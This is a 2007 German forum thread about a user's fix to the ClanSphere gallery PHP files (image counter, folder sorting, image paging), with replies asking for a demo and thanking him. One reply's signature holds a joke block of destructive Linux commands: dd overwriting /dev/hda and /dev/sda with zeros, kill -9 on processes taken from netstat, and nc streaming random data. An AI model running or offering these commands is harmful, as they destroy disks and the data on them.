Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 6
Seite [1]
Ho.B


King for a day



Herkunft: Berlin
Beiträge: 207
# Thema - 17.06.2007 um 22:59 Uhr
Da es sonst keiner gemacht hat, hab ich selbst mal ein wenig die gallery/list.php und gallery/com_view.php überarbeitet...

Dabei hab ich die 3 Fehler beseitigt:

Bildzähler
Ordnersortierung
Bildblättern

Damit werden jetzt alle Bilder aus beliebig vielen Unterordnern gezählt. Da mich dieses "letzte Aktualisierung" genervt hat, hab ich das nun aber nicht berücksichtigt und das ist nicht mit dabei ... ist vielleicht nicht der schönste Code, aber es funktioniert

Ebenfalls noch in der Datei wird überprüft, ob bei den Hauptordnern die Position nicht überall auf 0 ist. Wurde also eine Position angegeben, so werden alle Ordner nach der Position geordnet.

Dann die letzte Änderung in der com_view. Die ID des nächsten oder letzten Bildes wird nun nicht mehr wie vorher nach der Zeit bestimmt, sondern nach der nächstgrößeren oder kleineren Bild-ID.

Viel Spaß

http://web37.xps12.microserver.de/downloads/gallery.zip


------------------
Alle Angaben sind wie immer ohne Gewähr

Zuletzt editiert von Ho.B am 17.06.2007 um 22:59 Uhr (1x Editiert)
Inaktiv
Nosnos


Poststar




Herkunft: Clansphere City
Beiträge: 736
# Antwort: 1 - 18.06.2007 um 00:54 Uhr
ne Demo wäre toll


------------------
ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
Ho.B
Thread-Ersteller


King for a day



Herkunft: Berlin
Beiträge: 207
# Antwort: 2 - 18.06.2007 um 01:24 Uhr
Demo:

>>>Klick<<<

ein bisschen mehr begeisterung bitte ^^ das war nicht leicht


------------------
Alle Angaben sind wie immer ohne Gewähr

Zuletzt editiert von Ho.B am 18.06.2007 um 16:07 Uhr (1x Editiert)
Inaktiv
|
Ansager


Going for pro





Beiträge: 413
# Antwort: 3 - 30.06.2007 um 03:27 Uhr
coole sache, werds morgn ausprobiern etz is halb 4 früh bin kaputt

ps: wieso wird das in der svn nicht geändert mit dem bildzählen Oo


------------------


Zuletzt editiert von sheetle2_Ansager am 30.06.2007 um 03:28 Uhr (1x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 4 - 30.06.2007 um 11:53 Uhr
Ich schaue mir das nachher mal an und werde es ggf mit dem aus dem SVN aktualisieren


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Ansager


Going for pro





Beiträge: 413
# Antwort: 5 - 30.06.2007 um 12:00 Uhr
funzt echt einwandfrei

http://www.ansager.info/index.php?mod=gallery .... könnt natürlich als Besucher nur die erste kategorie anguckn und die bilder werden auch nur da gezählt


------------------


Inaktiv
|
Ho.B
Thread-Ersteller


King for a day



Herkunft: Berlin
Beiträge: 207
# Antwort: 6 - 30.06.2007 um 13:48 Uhr
wie gesagt das letzte änderungsdatum hab ich halt nicht berücksichtigt...

sah blöd aus und hat mich nicht interessiert, müsste man halt bei bedarf noch dazufügen


------------------
Alle Angaben sind wie immer ohne Gewähr

Inaktiv
|
Antworten: 6
Seite [1]


Sie müssen sich registrieren, um zu antworten.